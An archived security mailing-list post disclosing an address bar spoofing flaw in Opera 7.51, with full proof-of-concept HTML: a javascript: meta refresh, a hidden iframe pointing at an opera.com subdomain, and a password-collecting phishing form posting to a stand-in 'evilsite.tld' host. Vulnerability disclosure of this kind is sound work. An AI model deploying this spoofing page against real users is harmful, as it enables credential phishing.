lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <BAY1-F135gLu95IhwNq0006eb9b@hotmail.com>
From: bitlance_3 at hotmail.com (winter bitlance)
Subject: Opera Browser version 7.51 Address Bar Spoofing Vulnerability

Hi List.

A vulnerability is found in the Opera browser version 7.51 , which can be 
exploited by spammers to spoof information displayed in the address 
bar.Tested on Windows OS.

Demonstration HTML source code:

======== begin ========
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
[html lang="en"]
[head]
[meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
[meta http-equiv="Content-Script-Type" content="text/javascript"]
[meta http-equiv="Content-Style-Type" content="text/css"]
[meta http-equiv="REFRESH"
  content="0;url=javascript:(function(){})();"]
[title]Opera 7.51 Address Bar Spoofing Vulnerability[/title]
[script type="text/javascript"]
[!-- hide JavaScript from old browsers
var dummy="Do not remove this script element.";
// end hiding JavaScript --]
[/script]
[style type="text/css"]
[!-- /* hide iframe element. */
  iframe {
         display: none !important;
         }
/* hide iframe element. */ --]
[!-- /* pizza form */
  body {
         margin-left: 2em;
         margin-right: 2em;
         font-family:verdana;
         font-size:80%;
       }
  h1 { font-size:120%;}
  h2 { font-size:100%;}
  table { font-size:85%; background-color:buttonface; }
  table caption {
    background-color:activecaption; color:captiontext;
    font-weight:bold; text-align:left; }
  table table { font-size:100%; }
  table input { font-family:verdana; font-size:100%; }
  table select { font-family:verdana; font-size:100%; }
/* pizza form */ --]
[/style]
[/head]
[body]
[h1]Opera Browser version 7.51 Address Bar Spoofing Vulnerability[/h1]
[h2]Tested on Windows OS[/h2]
[p][a href="http://www.opera.com/" title="Opera 7.51, Everything You Need 
Online"]
Opera 7.51[/a], Everything You Need Online
[/p]
[iframe title="inline frame spoofing address bar"
src="https://pizza.opera.com/order.html"]
This inline frame is hidden. See CSS.
[/iframe]
[!-- below, phishing form order pizza --]
[h2]Welcome to Pizza Opera dot Com[/h2]
[form name="frmPizza" action="phishing://evilsite.tld"]
[table id="tblPizzaForm" cellspacing="0" cellpadding="3"]
[caption]Order Your Pizza[/caption]
[tr valign="top"]
  [td][label for="txtName" accesskey="M"]Na[u]m[/u]e: [/label][/td]
  [td][input type="text" name="txtName" id="txtName"][/td]
[/tr]
[tr valign="top"]
  [td][label for="txtPassword" accesskey="P"][u]P[/u]assword: [/label][/td]
  [td][input type="password" name="txtPassword" id="txtPassword"][/td]
[/tr]
[tr valign="top"]
  [td][label for="selSize" accesskey="S"][u]S[/u]ize: [/label][/td]
  [td]
    [select name="selSize" id="selSize"]
    [option value="0"]--- pick a size --- [/option]
    [option value="1"]Small[/option]
    [option value="2"]Medium[/option]
    [option value="3"]Large[/option]
    [/select]
  [/td]
[/tr]
[tr valign="top"]
  [td colspan="2"]
    [fieldset id="fstCrust"]
    [legend]Crust[/legend]
    [table cellpadding="1" cellspacing="0"]
    [tr]
      [td][input type="radio" name="radCrust" id="radCrust_Thick" 
value="Thick"][/td]
      [td][label for="radCrust_Thick" 
accesskey="K"]Thic[u]k[/u][/label][/td]
      [td][input type="radio" name="radCrust" id="radCrust_Thin" 
value="Thin"][/td]
      [td][label for="radCrust_Thin" accesskey="N"]Thi[u]n[/u][/label][/td]
    [/tr]
    [/table]
    [/fieldset]
  [/td]
[/tr]
[tr valign="top"]
  [td colspan="2"]
    [fieldset id="fstToppings"]
    [legend]Toppings[/legend]
    [table cellpadding="1" cellspacing="0"]
    [tr]
      [td][input type="checkbox" name="chkHam" id="chkHam" value="Ham"][/td]
      [td][label for="chkHam" accesskey="H"][u]H[/u]am[/label][/td]
    [/tr]
    [tr]
      [td][input type="checkbox" name="chkPineapple" id="chkPineapple" 
value="Pineapple"][/td]
      [td][label for="chkPineapple" 
accesskey="I"]P[u]i[/u]neapple[/label][/td]
    [/tr]
    [tr]
      [td][input type="checkbox" name="chkExtraCheese" id="chkExtraCheese" 
value="Extra Cheese"][/td]
      [td][label for="chkExtraCheese" accesskey="E"][u]E[/u]xtra 
Cheese[/label][/td]
    [/tr]
    [/table]
    [/fieldset]
  [/td]
[/tr]
[tr valign="top"]
  [td colspan="2" align="right"][input type="submit" value="   Order!   
"][/td]
[/tr]
[/table]
[/form]
[/body]
[/html]
========= end =========
(Sorry,too long code.)

Thank you, List.

--
bitlance winter

P.S.
I tender my acknowledgment to my godparent who has named 'bitlance'.

_________________________________________________________________
Watch the online reality show Mixed Messages with a friend and enter to win 
a trip to NY 
http://www.msnmessenger-download.click-url.com/go/onm00200497ave/direct/01/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ